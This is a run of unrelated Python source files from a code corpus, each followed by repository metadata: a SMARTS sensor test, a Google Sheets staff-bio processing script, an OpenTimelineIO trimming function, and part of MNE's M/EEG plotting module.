yield Scenario.variations_for_all_scenario_roots(
[str(scenario_root)], [AGENT_ID]
)
def test_waypoints_sensor(scenarios):
scenario = next(scenarios)
sim = mock.Mock()
vehicle = mock.Mock()
vehicle.pose = Pose(
position=np.array([33, -65, 0]),
orientation=[0, 0, 0, 0],
heading_=Heading(0),
)
mission = scenario.missions[AGENT_ID]
plan = Plan(scenario.road_map, mission)
sensor = WaypointsSensor(vehicle, plan)
waypoints = sensor()
assert len(waypoints) == 3
| 33.24 | 83 | 0.690734 | [
"MIT"
] | ehtnamuh/Smarts-Fork | smarts/core/tests/test_sensors.py | 3,324 | Python |
from PIL import Image
import gspread
import hashlib
from googleapiclient.errors import HttpError
from oauth2client.service_account import ServiceAccountCredentials
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from googleapiclient.http import MediaIoBaseDownload
import io
import json
def has_transparency(image: Image) -> bool:
    """Return True if the image has an alpha channel or a transparent palette entry."""
if image.mode == "P":
transparent = image.info.get("transparency", -1)
for _, index in image.getcolors():
if index == transparent:
return True
elif image.mode == "RGBA":
extrema = image.getextrema()
if extrema[3][0] < 255:
return True
return False
# from https://stackoverflow.com/questions/61201141/how-can-i-crop-an-image-with-11-aspect-ratio-using-pillow-in-python
def crop_image(image):
width, height = image.size
if width == height:
return image
offset = int(abs(height - width) / 2)
if width > height:
image = image.crop([offset, 0, width - offset, height])
else:
image = image.crop([0, offset, width, height - offset])
return image
def resize_image(image):
    """Downscale the image to a maximum width of 256px, preserving the aspect ratio."""
width, height = image.size
new_width = 256
if width < new_width:
return image
new_height = new_width * height / width
return image.resize((new_width, int(new_height)), Image.ANTIALIAS)
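# Hedged usage sketch (not part of the original script): the two helpers above
# are meant to be chained, first cropping to a 1:1 aspect ratio and then
# capping the width at 256px; "example.png" is a placeholder path.
#
#     thumb = resize_image(crop_image(Image.open("example.png")))
#     thumb.save("example_256.png")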
def LongestBio(section: list) -> int:
    """Return the length of the longest bio description in the given section."""
longestBio = 0
for items in section:
if longestBio < len(items["description"]):
longestBio = len(items["description"])
return longestBio
def sortBioLength(bioList: list) -> list:
    """Return the bios sorted by description length, longest first."""
holdingList = []
workingList = bioList
for x in range(len(workingList)):
highest = LongestBio(workingList)
itemIndex = -1
for items in workingList:
itemIndex = itemIndex + 1
if len(items["description"]) == highest:
holdingList.append(items)
break
if itemIndex != -1:
del workingList[itemIndex]
return holdingList
# Deals with getting all the auth set up for connecting to GSheet
scope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']
# Needs to link to auth file given by google dev dashboard
creds = ServiceAccountCredentials.from_json_keyfile_name("secrets/googleAuth.json", scope)
client = gspread.authorize(creds)
sheet = client.open("Low Ink Staff Bio Form (Responses)") # Name of the google sheet file
worksheet = sheet.worksheet("input") # name of the sheet in question
worksheetData = worksheet.get_all_records()
# This is the auth scope for Google Drive API
creds = None
if os.path.exists('secrets/token.pickle'):
with open('secrets/token.pickle', 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'secrets/credentials.json', ['https://www.googleapis.com/auth/drive'])
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open('secrets/token.pickle', 'wb') as token:
pickle.dump(creds, token)
service = build('drive', 'v3', credentials=creds)
commentator = []
former = []
headTO = []
orgHead = []
production = []
staff = []
artists = []
for lines in worksheetData:
output = {}
if lines["isStaff"] in ["Yes (Staff temp invite)", "Yes", "Yes (Staff, temp, invite)"]:
print("Outputting for: {}".format(lines["name"]))
staffID = hashlib.md5(lines["name"].encode("utf-8")).hexdigest()
# Obtains image from google drive
imageID = (lines["image"].split("?id="))[1] # get the G Drive file ID from share
request = service.files().get_media(fileId=imageID)
fh = io.FileIO("holding/{}.png".format(staffID), "wb") # states where the file saves to
# Downloads file
downloader = MediaIoBaseDownload(fh, request)
output_file_format = 'png'
done = False
while done is False:
try:
status, done = downloader.next_chunk()
except HttpError as e:
print("Could not output image. Please provide file '{}' manually.".format("output/images/{}.png").format(staffID))
print("Error message: '{}'".format(e.error_details[0]["message"]))
break
if done is True:
# Crops image to be 1:1
staff_image = crop_image(Image.open("holding/{}.png".format(staffID)))
staff_image = resize_image(staff_image)
if has_transparency(staff_image):
staff_image.convert("P", palette=Image.ADAPTIVE).save("output/images/{}.png".format(staffID))
else:
staff_image.convert("RGB", palette=Image.ADAPTIVE).save("output/images/{}.jpg".format(staffID))
output_file_format = 'jpg'
staff_image.close()
output = {
"title": lines["name"],
"description": (lines["bio"].replace("\n", "")).replace("\r", " "),
"imagePath": "images/Staff/{}.{}".format(staffID, output_file_format),
"twitter": lines["twitter"],
"credit": lines["credits"]
}
# Save bio to right list
if lines["header"] == "General Staff":
staff.append(output)
elif lines["header"] == "Commentators":
commentator.append(output)
elif lines["header"] == "Head TO":
headTO.append(output)
elif lines["header"] == "Production & Development":
production.append(output)
elif lines["header"] == "Org Head":
orgHead.append(output)
elif lines["header"] == "Temp staff":
staff.append(output)
elif lines["header"] == "Former staff":
former.append(output)
elif lines["header"] == "Guest Staff":
staff.append(output)
elif lines["header"] == "Artist":
artists.append(output)
staffFile = [
{"elemClassName": "staff-layout-grid",
"contents": sortBioLength(staff)},
{"elemClassName": "org-head-grid",
"contents": sortBioLength(orgHead)},
{"elemClassName": "head-TO-grid",
"contents": sortBioLength(headTO)},
{"elemClassName": "production-grid",
"contents": sortBioLength(production)},
{"elemClassName": "commentator-grid",
"contents": sortBioLength(commentator)},
{"elemClassName": "former-staff-grid",
"contents": sortBioLength(former)},
{"elemClassName": "artists-staff-grid",
"contents": sortBioLength(artists)}
]
with open('output/staff.json', 'w') as file:
json.dump(staffFile, file)
| 36.223958 | 130 | 0.63005 | [
"MIT"
] | IPL-Splat/IPL-Splat.github.io | dataProcessor/processBio.py | 6,955 | Python |
#
# Copyright Contributors to the OpenTimelineIO project
#
# Licensed under the Apache License, Version 2.0 (the "Apache License")
# with the following modification; you may not use this file except in
# compliance with the Apache License and the following modification to it:
# Section 6. Trademarks. is deleted and replaced with:
#
# 6. Trademarks. This License does not grant permission to use the trade
# names, trademarks, service marks, or product names of the Licensor
# and its affiliates, except as required to comply with Section 4(c) of
# the License and to reproduce the content of the NOTICE file.
#
# You may obtain a copy of the Apache License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the Apache License with the above modification is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the Apache License for the specific
# language governing permissions and limitations under the Apache License.
#
"""Algorithms for timeline objects."""
import copy
from . import (
track_algo
)
def timeline_trimmed_to_range(in_timeline, trim_range):
"""Returns a new timeline that is a copy of the in_timeline, but with items
outside the trim_range removed and items on the ends trimmed to the
trim_range. Note that the timeline is never expanded, only shortened.
Please note that you could do nearly the same thing non-destructively by
just setting the Track's source_range but sometimes you want to really cut
away the stuff outside and that's what this function is meant for."""
new_timeline = copy.deepcopy(in_timeline)
for track_num, child_track in enumerate(in_timeline.tracks):
# @TODO: put the trim_range into the space of the tracks
# new_range = new_timeline.tracks.transformed_time_range(
# trim_range,
# child_track
# )
# trim the track and assign it to the new stack.
new_timeline.tracks[track_num] = track_algo.track_trimmed_to_range(
child_track,
trim_range
)
return new_timeline
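# Hedged usage sketch (not part of the original module): trimming a one-clip
# timeline down to its first second of 24 fps media. All names below are
# placeholders built from public opentimelineio APIs.
#
#     import opentimelineio as otio
#
#     timeline = otio.schema.Timeline(name="demo")
#     track = otio.schema.Track()
#     track.append(otio.schema.Clip(
#         name="clip",
#         source_range=otio.opentime.TimeRange(
#             otio.opentime.RationalTime(0, 24),
#             otio.opentime.RationalTime(48, 24))))
#     timeline.tracks.append(track)
#     first_second = timeline_trimmed_to_range(
#         timeline,
#         otio.opentime.TimeRange(otio.opentime.RationalTime(0, 24),
#                                 otio.opentime.RationalTime(24, 24)))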
| 38.877193 | 79 | 0.733303 | [
"Apache-2.0"
] | AWhetter/OpenTimelineIO | src/py-opentimelineio/opentimelineio/algorithms/timeline_algo.py | 2,216 | Python |
# -*- coding: utf-8 -*-
"""Functions to make simple plots with M/EEG data."""
# Authors: Alexandre Gramfort <[email protected]>
# Denis Engemann <[email protected]>
# Martin Luessi <[email protected]>
# Eric Larson <[email protected]>
# Cathy Nangini <[email protected]>
# Mainak Jas <[email protected]>
#
# License: Simplified BSD
import base64
import copy
from glob import glob
from io import BytesIO
from itertools import cycle
import os.path as op
import warnings
from distutils.version import LooseVersion
from collections import defaultdict
import numpy as np
from scipy import linalg
from ..defaults import DEFAULTS
from ..fixes import _get_img_fdata
from ..rank import compute_rank
from ..source_space import _mri_orientation
from ..surface import read_surface
from ..io.constants import FIFF
from ..io.proj import make_projector
from ..io.pick import (_DATA_CH_TYPES_SPLIT, pick_types, pick_info,
pick_channels)
from ..source_space import (read_source_spaces, SourceSpaces, _read_mri_info,
_check_mri, _ensure_src)
from ..transforms import invert_transform, apply_trans, _frame_to_str
from ..utils import (logger, verbose, warn, _check_option, get_subjects_dir,
_mask_to_onsets_offsets, _pl, _on_missing)
from ..io.pick import _picks_by_type
from ..filter import estimate_ringing_samples
from .utils import tight_layout, _get_color_list, _prepare_trellis, plt_show
def _index_info_cov(info, cov, exclude):
if exclude == 'bads':
exclude = info['bads']
info = pick_info(info, pick_channels(info['ch_names'], cov['names'],
exclude))
del exclude
picks_list = \
_picks_by_type(info, meg_combined=False, ref_meg=False,
exclude=())
picks_by_type = dict(picks_list)
ch_names = [n for n in cov.ch_names if n in info['ch_names']]
ch_idx = [cov.ch_names.index(n) for n in ch_names]
info_ch_names = info['ch_names']
idx_by_type = defaultdict(list)
for ch_type, sel in picks_by_type.items():
idx_by_type[ch_type] = [ch_names.index(info_ch_names[c])
for c in sel if info_ch_names[c] in ch_names]
idx_names = [(idx_by_type[key],
'%s covariance' % DEFAULTS['titles'][key],
DEFAULTS['units'][key],
DEFAULTS['scalings'][key],
key)
for key in _DATA_CH_TYPES_SPLIT
if len(idx_by_type[key]) > 0]
C = cov.data[ch_idx][:, ch_idx]
return info, C, ch_names, idx_names
@verbose
def plot_cov(cov, info, exclude=(), colorbar=True, proj=False, show_svd=True,
show=True, verbose=None):
"""Plot Covariance data.
Parameters
----------
cov : instance of Covariance
The covariance matrix.
info : dict
Measurement info.
exclude : list of str | str
List of channels to exclude. If empty do not exclude any channel.
If 'bads', exclude info['bads'].
colorbar : bool
Show colorbar or not.
proj : bool
Apply projections or not.
show_svd : bool
Plot also singular values of the noise covariance for each sensor
type. We show square roots ie. standard deviations.
show : bool
Show figure if True.
%(verbose)s
Returns
-------
fig_cov : instance of matplotlib.figure.Figure
The covariance plot.
fig_svd : instance of matplotlib.figure.Figure | None
The SVD spectra plot of the covariance.
See Also
--------
mne.compute_rank
Notes
-----
For each channel type, the rank is estimated using
:func:`mne.compute_rank`.
.. versionchanged:: 0.19
Approximate ranks for each channel type are shown with red dashed lines.
"""
from ..cov import Covariance
import matplotlib.pyplot as plt
from matplotlib.colors import Normalize
info, C, ch_names, idx_names = _index_info_cov(info, cov, exclude)
del cov, exclude
projs = []
if proj:
projs = copy.deepcopy(info['projs'])
# Activate the projection items
for p in projs:
p['active'] = True
P, ncomp, _ = make_projector(projs, ch_names)
if ncomp > 0:
logger.info(' Created an SSP operator (subspace dimension'
' = %d)' % ncomp)
C = np.dot(P, np.dot(C, P.T))
else:
logger.info(' The projection vectors do not apply to these '
'channels.')
fig_cov, axes = plt.subplots(1, len(idx_names), squeeze=False,
figsize=(3.8 * len(idx_names), 3.7))
for k, (idx, name, _, _, _) in enumerate(idx_names):
vlim = np.max(np.abs(C[idx][:, idx]))
im = axes[0, k].imshow(C[idx][:, idx], interpolation="nearest",
norm=Normalize(vmin=-vlim, vmax=vlim),
cmap='RdBu_r')
axes[0, k].set(title=name)
if colorbar:
from mpl_toolkits.axes_grid1 import make_axes_locatable
divider = make_axes_locatable(axes[0, k])
cax = divider.append_axes("right", size="5.5%", pad=0.05)
plt.colorbar(im, cax=cax, format='%.0e')
fig_cov.subplots_adjust(0.04, 0.0, 0.98, 0.94, 0.2, 0.26)
tight_layout(fig=fig_cov)
fig_svd = None
if show_svd:
fig_svd, axes = plt.subplots(1, len(idx_names), squeeze=False,
figsize=(3.8 * len(idx_names), 3.7))
for k, (idx, name, unit, scaling, key) in enumerate(idx_names):
this_C = C[idx][:, idx]
s = linalg.svd(this_C, compute_uv=False)
this_C = Covariance(this_C, [info['ch_names'][ii] for ii in idx],
[], [], 0)
this_info = pick_info(info, idx)
this_info['projs'] = []
this_rank = compute_rank(this_C, info=this_info)
# Protect against true zero singular values
s[s <= 0] = 1e-10 * s[s > 0].min()
s = np.sqrt(s) * scaling
axes[0, k].plot(s, color='k', zorder=3)
this_rank = this_rank[key]
axes[0, k].axvline(this_rank - 1, ls='--', color='r',
alpha=0.5, zorder=4, clip_on=False)
axes[0, k].text(this_rank - 1, axes[0, k].get_ylim()[1],
'rank ≈ %d' % (this_rank,), ha='right', va='top',
color='r', alpha=0.5, zorder=4)
axes[0, k].set(ylabel=u'Noise σ (%s)' % unit, yscale='log',
xlabel='Eigenvalue index', title=name,
xlim=[0, len(s) - 1])
tight_layout(fig=fig_svd)
plt_show(show)
return fig_cov, fig_svd
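# Hedged usage sketch (not part of the original module): the typical call site
# pairs a noise covariance with the measurement info it was computed from;
# ``raw`` is a placeholder for any loaded Raw recording.
#
#     import mne
#
#     cov = mne.compute_raw_covariance(raw)
#     fig_cov, fig_svd = plot_cov(cov, raw.info, proj=True, show_svd=True)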
def plot_source_spectrogram(stcs, freq_bins, tmin=None, tmax=None,
source_index=None, colorbar=False, show=True):
"""Plot source power in time-freqency grid.
Parameters
----------
stcs : list of SourceEstimate
Source power for consecutive time windows, one SourceEstimate object
should be provided for each frequency bin.
freq_bins : list of tuples of float
Start and end points of frequency bins of interest.
tmin : float
Minimum time instant to show.
tmax : float
Maximum time instant to show.
source_index : int | None
Index of source for which the spectrogram will be plotted. If None,
the source with the largest activation will be selected.
colorbar : bool
If true, a colorbar will be added to the plot.
show : bool
Show figure if True.
Returns
-------
fig : instance of Figure
The figure.
"""
import matplotlib.pyplot as plt
# Input checks
if len(stcs) == 0:
raise ValueError('cannot plot spectrogram if len(stcs) == 0')
stc = stcs[0]
if tmin is not None and tmin < stc.times[0]:
raise ValueError('tmin cannot be smaller than the first time point '
'provided in stcs')
if tmax is not None and tmax > stc.times[-1] + stc.tstep:
raise ValueError('tmax cannot be larger than the sum of the last time '
'point and the time step, which are provided in stcs')
# Preparing time-frequency cell boundaries for plotting
if tmin is None:
tmin = stc.times[0]
if tmax is None:
tmax = stc.times[-1] + stc.tstep
time_bounds = np.arange(tmin, tmax + stc.tstep, stc.tstep)
freq_bounds = sorted(set(np.ravel(freq_bins)))
freq_ticks = copy.deepcopy(freq_bounds)
# Reject time points that will not be plotted and gather results
source_power = []
for stc in stcs:
stc = stc.copy() # copy since crop modifies inplace
stc.crop(tmin, tmax - stc.tstep)
source_power.append(stc.data)
source_power = np.array(source_power)
# Finding the source with maximum source power
if source_index is None:
source_index = np.unravel_index(source_power.argmax(),
source_power.shape)[1]
# If there is a gap in the frequency bins record its locations so that it
# can be covered with a gray horizontal bar
gap_bounds = []
for i in range(len(freq_bins) - 1):
lower_bound = freq_bins[i][1]
upper_bound = freq_bins[i + 1][0]
if lower_bound != upper_bound:
freq_bounds.remove(lower_bound)
gap_bounds.append((lower_bound, upper_bound))
# Preparing time-frequency grid for plotting
time_grid, freq_grid = np.meshgrid(time_bounds, freq_bounds)
# Plotting the results
fig = plt.figure(figsize=(9, 6))
plt.pcolor(time_grid, freq_grid, source_power[:, source_index, :],
cmap='Reds')
ax = plt.gca()
ax.set(title='Source power', xlabel='Time (s)', ylabel='Frequency (Hz)')
time_tick_labels = [str(np.round(t, 2)) for t in time_bounds]
n_skip = 1 + len(time_bounds) // 10
for i in range(len(time_bounds)):
if i % n_skip != 0:
time_tick_labels[i] = ''
ax.set_xticks(time_bounds)
ax.set_xticklabels(time_tick_labels)
plt.xlim(time_bounds[0], time_bounds[-1])
plt.yscale('log')
ax.set_yticks(freq_ticks)
ax.set_yticklabels([np.round(freq, 2) for freq in freq_ticks])
plt.ylim(freq_bounds[0], freq_bounds[-1])
plt.grid(True, ls='-')
if colorbar:
plt.colorbar()
tight_layout(fig=fig)
# Covering frequency gaps with horizontal bars
for lower_bound, upper_bound in gap_bounds:
plt.barh(lower_bound, time_bounds[-1] - time_bounds[0], upper_bound -
lower_bound, time_bounds[0], color='#666666')
plt_show(show)
return fig
def _plot_mri_contours(mri_fname, surfaces, src, orientation='coronal',
slices=None, show=True, show_indices=False,
show_orientation=False, img_output=False):
"""Plot BEM contours on anatomical slices."""
import matplotlib.pyplot as plt
from matplotlib import patheffects
# For ease of plotting, we will do everything in voxel coordinates.
_check_option('orientation', orientation, ('coronal', 'axial', 'sagittal'))
# Load the T1 data
_, vox_mri_t, _, _, _, nim = _read_mri_info(
mri_fname, units='mm', return_img=True)
mri_vox_t = invert_transform(vox_mri_t)['trans']
del vox_mri_t
# plot axes (x, y, z) as data axes
(x, y, z), (flip_x, flip_y, flip_z), order = _mri_orientation(
nim, orientation)
transpose = x < y
data = _get_img_fdata(nim)
shift_x = data.shape[x] if flip_x < 0 else 0
shift_y = data.shape[y] if flip_y < 0 else 0
n_slices = data.shape[z]
if slices is None:
slices = np.round(np.linspace(0, n_slices - 1, 14)).astype(int)[1:-1]
slices = np.atleast_1d(slices).copy()
slices[slices < 0] += n_slices # allow negative indexing
if not np.array_equal(np.sort(slices), slices) or slices.ndim != 1 or \
slices.size < 1 or slices[0] < 0 or slices[-1] >= n_slices or \
slices.dtype.kind not in 'iu':
raise ValueError('slices must be a sorted 1D array of int with unique '
'elements, at least one element, and no elements '
'greater than %d, got %s' % (n_slices - 1, slices))
if flip_z < 0:
        # Proceed in the opposite order to maintain left-to-right orientation
slices = slices[::-1]
# create of list of surfaces
surfs = list()
for file_name, color in surfaces:
surf = dict()
surf['rr'], surf['tris'] = read_surface(file_name)
# move surface to voxel coordinate system
surf['rr'] = apply_trans(mri_vox_t, surf['rr'])
surfs.append((surf, color))
sources = list()
if src is not None:
_ensure_src(src, extra=' or None')
# Eventually we can relax this by allowing ``trans`` if need be
if src[0]['coord_frame'] != FIFF.FIFFV_COORD_MRI:
raise ValueError(
'Source space must be in MRI coordinates, got '
f'{_frame_to_str[src[0]["coord_frame"]]}')
for src_ in src:
points = src_['rr'][src_['inuse'].astype(bool)]
sources.append(apply_trans(mri_vox_t, points * 1e3))
sources = np.concatenate(sources, axis=0)
if img_output:
n_col = n_axes = 1
fig, ax = plt.subplots(1, 1, figsize=(7.0, 7.0))
axs = [ax] * len(slices)
w = fig.get_size_inches()[0]
fig.set_size_inches([w, w / data.shape[x] * data.shape[y]])
plt.close(fig)
else:
n_col = 4
fig, axs, _, _ = _prepare_trellis(len(slices), n_col)
n_axes = len(axs)
fig.set_facecolor('k')
bounds = np.concatenate(
[[-np.inf], slices[:-1] + np.diff(slices) / 2., [np.inf]]) # float
slicer = [slice(None)] * 3
ori_labels = dict(R='LR', A='PA', S='IS')
xlabels, ylabels = ori_labels[order[0]], ori_labels[order[1]]
path_effects = [patheffects.withStroke(linewidth=4, foreground="k",
alpha=0.75)]
out = list() if img_output else fig
for ai, (ax, sl, lower, upper) in enumerate(zip(
axs, slices, bounds[:-1], bounds[1:])):
# adjust the orientations for good view
slicer[z] = sl
dat = data[tuple(slicer)]
dat = dat.T if transpose else dat
dat = dat[::flip_y, ::flip_x]
# First plot the anatomical data
if img_output:
ax.clear()
ax.imshow(dat, cmap=plt.cm.gray, origin='lower')
ax.set_autoscale_on(False)
ax.axis('off')
ax.set_aspect('equal') # XXX eventually could deal with zooms
# and then plot the contours on top
for surf, color in surfs:
with warnings.catch_warnings(record=True): # ignore contour warn
warnings.simplefilter('ignore')
ax.tricontour(flip_x * surf['rr'][:, x] + shift_x,
flip_y * surf['rr'][:, y] + shift_y,
surf['tris'], surf['rr'][:, z],
levels=[sl], colors=color, linewidths=1.0,
zorder=1)
if len(sources):
in_slice = (sources[:, z] >= lower) & (sources[:, z] < upper)
ax.scatter(flip_x * sources[in_slice, x] + shift_x,
flip_y * sources[in_slice, y] + shift_y,
marker='.', color='#FF00FF', s=1, zorder=2)
if show_indices:
ax.text(dat.shape[1] // 8 + 0.5, 0.5, str(sl),
color='w', fontsize='x-small', va='bottom', ha='left')
# label the axes
kwargs = dict(
color='#66CCEE', fontsize='medium', path_effects=path_effects,
family='monospace', clip_on=False, zorder=5, weight='bold')
if show_orientation:
if ai % n_col == 0: # left
ax.text(0, dat.shape[0] / 2., xlabels[0],
va='center', ha='left', **kwargs)
if ai % n_col == n_col - 1 or ai == n_axes - 1: # right
ax.text(dat.shape[1] - 1, dat.shape[0] / 2., xlabels[1],
va='center', ha='right', **kwargs)
if ai >= n_axes - n_col: # bottom
ax.text(dat.shape[1] / 2., 0, ylabels[0],
ha='center', va='bottom', **kwargs)
if ai < n_col or n_col == 1: # top
ax.text(dat.shape[1] / 2., dat.shape[0] - 1, ylabels[1],
ha='center', va='top', **kwargs)
if img_output:
output = BytesIO()
fig.savefig(output, bbox_inches='tight',
pad_inches=0, format='png')
out.append(base64.b64encode(output.getvalue()).decode('ascii'))
fig.subplots_adjust(left=0., bottom=0., right=1., top=1., wspace=0.,
hspace=0.)
plt_show(show, fig=fig)
return out
def plot_bem(subject=None, subjects_dir=None, orientation='coronal',
slices=None, brain_surfaces=None, src=None, show=True,
show_indices=True, mri='T1.mgz', show_orientation=True):
"""Plot BEM contours on anatomical slices.
Parameters
----------
subject : str
Subject name.
subjects_dir : str | None
Path to the SUBJECTS_DIR. If None, the path is obtained by using
the environment variable SUBJECTS_DIR.
orientation : str
'coronal' or 'axial' or 'sagittal'.
slices : list of int
Slice indices.
brain_surfaces : None | str | list of str
        One or more brain surfaces to plot (optional). Entries should correspond
to files in the subject's ``surf`` directory (e.g. ``"white"``).
src : None | SourceSpaces | str
SourceSpaces instance or path to a source space to plot individual
sources as scatter-plot. Sources will be shown on exactly one slice
(whichever slice is closest to each source in the given orientation
plane). Path can be absolute or relative to the subject's ``bem``
folder.
.. versionchanged:: 0.20
All sources are shown on the nearest slice rather than some
being omitted.
show : bool
Show figure if True.
show_indices : bool
Show slice indices if True.
.. versionadded:: 0.20
mri : str
The name of the MRI to use. Can be a standard FreeSurfer MRI such as
``'T1.mgz'``, or a full path to a custom MRI file.
.. versionadded:: 0.21
    show_orientation : bool
Show the orientation (L/R, P/A, I/S) of the data slices.
.. versionadded:: 0.21
Returns
-------
fig : instance of matplotlib.figure.Figure
The figure.
See Also
--------
mne.viz.plot_alignment
Notes
-----
Images are plotted in MRI voxel coordinates.
If ``src`` is not None, for a given slice index, all source points are
shown that are halfway between the previous slice and the given slice,
and halfway between the given slice and the next slice.
For large slice decimations, this can
make some source points appear outside the BEM contour, which is shown
for the given slice index. For example, in the case where the single
midpoint slice is used ``slices=[128]``, all source points will be shown
on top of the midpoint MRI slice with the BEM boundary drawn for that
slice.
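    Examples
    --------
    A minimal usage sketch (the subject name, directory, and slice indices
    below are placeholders, not shipped data)::
        >>> from mne.viz import plot_bem  # doctest: +SKIP
        >>> plot_bem(subject='sample', subjects_dir='/path/to/subjects',
        ...          orientation='axial', slices=[100, 128, 156])  # doctest: +SKIP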
"""
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
mri_fname = _check_mri(mri, subject, subjects_dir)
# Get the BEM surface filenames
bem_path = op.join(subjects_dir, subject, 'bem')
if not op.isdir(bem_path):
raise IOError('Subject bem directory "%s" does not exist' % bem_path)
surfaces = _get_bem_plotting_surfaces(bem_path)
if brain_surfaces is not None:
if isinstance(brain_surfaces, str):
brain_surfaces = (brain_surfaces,)
for surf_name in brain_surfaces:
for hemi in ('lh', 'rh'):
surf_fname = op.join(subjects_dir, subject, 'surf',
hemi + '.' + surf_name)
if op.exists(surf_fname):
surfaces.append((surf_fname, '#00DD00'))
else:
raise IOError("Surface %s does not exist." % surf_fname)
if isinstance(src, str):
if not op.exists(src):
src_ = op.join(subjects_dir, subject, 'bem', src)
if op.exists(src_):
src = src_
else:
raise IOError("%s does not exist" % src)
src = read_source_spaces(src)
elif src is not None and not isinstance(src, SourceSpaces):
raise TypeError("src needs to be None, str or SourceSpaces instance, "
"not %s" % repr(src))
if len(surfaces) == 0:
raise IOError('No surface files found. Surface files must end with '
'inner_skull.surf, outer_skull.surf or outer_skin.surf')
# Plot the contours
return _plot_mri_contours(mri_fname, surfaces, src, orientation, slices,
show, show_indices, show_orientation)
def _get_bem_plotting_surfaces(bem_path):
surfaces = []
for surf_name, color in (('*inner_skull', '#FF0000'),
('*outer_skull', '#FFFF00'),
('*outer_skin', '#FFAA80')):
surf_fname = glob(op.join(bem_path, surf_name + '.surf'))
if len(surf_fname) > 0:
surf_fname = surf_fname[0]
logger.info("Using surface: %s" % surf_fname)
surfaces.append((surf_fname, color))
return surfaces
@verbose
def plot_events(events, sfreq=None, first_samp=0, color=None, event_id=None,
axes=None, equal_spacing=True, show=True, on_missing='raise',
verbose=None):
"""Plot events to get a visual display of the paradigm.
Parameters
----------
events : array, shape (n_events, 3)
The events.
sfreq : float | None
The sample frequency. If None, data will be displayed in samples (not
seconds).
first_samp : int
The index of the first sample. Recordings made on Neuromag systems
number samples relative to the system start (not relative to the
beginning of the recording). In such cases the ``raw.first_samp``
attribute can be passed here. Default is 0.
color : dict | None
Dictionary of event_id integers as keys and colors as values. If None,
colors are automatically drawn from a default list (cycled through if
number of events longer than list of default colors). Color can be any
valid :doc:`matplotlib color <tutorials/colors/colors>`.
event_id : dict | None
Dictionary of event labels (e.g. 'aud_l') as keys and their associated
event_id values. Labels are used to plot a legend. If None, no legend
is drawn.
axes : instance of Axes
The subplot handle.
equal_spacing : bool
Use equal spacing between events in y-axis.
show : bool
Show figure if True.
%(on_missing_events)s
%(verbose)s
Returns
-------
fig : matplotlib.figure.Figure
The figure object containing the plot.
Notes
-----
.. versionadded:: 0.9.0
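    Examples
    --------
    A minimal sketch with a hand-made event array (sample numbers and event
    IDs are arbitrary)::
        >>> import numpy as np  # doctest: +SKIP
        >>> events = np.array([[200, 0, 1], [600, 0, 2], [1200, 0, 1]])  # doctest: +SKIP
        >>> plot_events(events, sfreq=1000., event_id={'aud': 1, 'vis': 2})  # doctest: +SKIP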
"""
if sfreq is None:
sfreq = 1.0
xlabel = 'Samples'
else:
xlabel = 'Time (s)'
events = np.asarray(events)
if len(events) == 0:
raise ValueError('No events in events array, cannot plot.')
unique_events = np.unique(events[:, 2])
if event_id is not None:
# get labels and unique event ids from event_id dict,
# sorted by value
event_id_rev = {v: k for k, v in event_id.items()}
conditions, unique_events_id = zip(*sorted(event_id.items(),
key=lambda x: x[1]))
keep = np.ones(len(unique_events_id), bool)
for ii, this_event in enumerate(unique_events_id):
if this_event not in unique_events:
msg = f'{this_event} from event_id is not present in events.'
_on_missing(on_missing, msg)
keep[ii] = False
conditions = [cond for cond, k in zip(conditions, keep) if k]
unique_events_id = [id_ for id_, k in zip(unique_events_id, keep) if k]
if len(unique_events_id) == 0:
raise RuntimeError('No usable event IDs found')
for this_event in unique_events:
if this_event not in unique_events_id:
warn('event %s missing from event_id will be ignored'
% this_event)
else:
unique_events_id = unique_events
color = _handle_event_colors(color, unique_events, event_id)
import matplotlib.pyplot as plt
fig = None
if axes is None:
fig = plt.figure()
ax = axes if axes else plt.gca()
unique_events_id = np.array(unique_events_id)
min_event = np.min(unique_events_id)
max_event = np.max(unique_events_id)
max_x = (events[np.in1d(events[:, 2], unique_events_id), 0].max() -
first_samp) / sfreq
handles, labels = list(), list()
for idx, ev in enumerate(unique_events_id):
ev_mask = events[:, 2] == ev
count = ev_mask.sum()
if count == 0:
continue
y = np.full(count, idx + 1 if equal_spacing else events[ev_mask, 2][0])
if event_id is not None:
event_label = '%s (%s)' % (event_id_rev[ev], count)
else:
event_label = 'N=%d' % (count,)
labels.append(event_label)
kwargs = {}
if ev in color:
kwargs['color'] = color[ev]
handles.append(
ax.plot((events[ev_mask, 0] - first_samp) / sfreq,
y, '.', clip_on=False, **kwargs)[0])
if equal_spacing:
ax.set_ylim(0, unique_events_id.size + 1)
ax.set_yticks(1 + np.arange(unique_events_id.size))
ax.set_yticklabels(unique_events_id)
else:
ax.set_ylim([min_event - 1, max_event + 1])
ax.set(xlabel=xlabel, ylabel='Events id', xlim=[0, max_x])
ax.grid(True)
fig = fig if fig is not None else plt.gcf()
# reverse order so that the highest numbers are at the top
# (match plot order)
handles, labels = handles[::-1], labels[::-1]
box = ax.get_position()
factor = 0.8 if event_id is not None else 0.9
ax.set_position([box.x0, box.y0, box.width * factor, box.height])
ax.legend(handles, labels, loc='center left', bbox_to_anchor=(1, 0.5),
fontsize='small')
fig.canvas.draw()
plt_show(show)
return fig
def _get_presser(fig):
"""Get our press callback."""
import matplotlib
callbacks = fig.canvas.callbacks.callbacks['button_press_event']
func = None
for key, val in callbacks.items():
if LooseVersion(matplotlib.__version__) >= '3':
func = val()
else:
func = val.func
if func.__class__.__name__ == 'partial':
break
else:
func = None
assert func is not None
return func
def plot_dipole_amplitudes(dipoles, colors=None, show=True):
"""Plot the amplitude traces of a set of dipoles.
Parameters
----------
dipoles : list of instance of Dipole
The dipoles whose amplitudes should be shown.
colors : list of color | None
Color to plot with each dipole. If None default colors are used.
show : bool
Show figure if True.
Returns
-------
fig : matplotlib.figure.Figure
The figure object containing the plot.
Notes
-----
.. versionadded:: 0.9.0
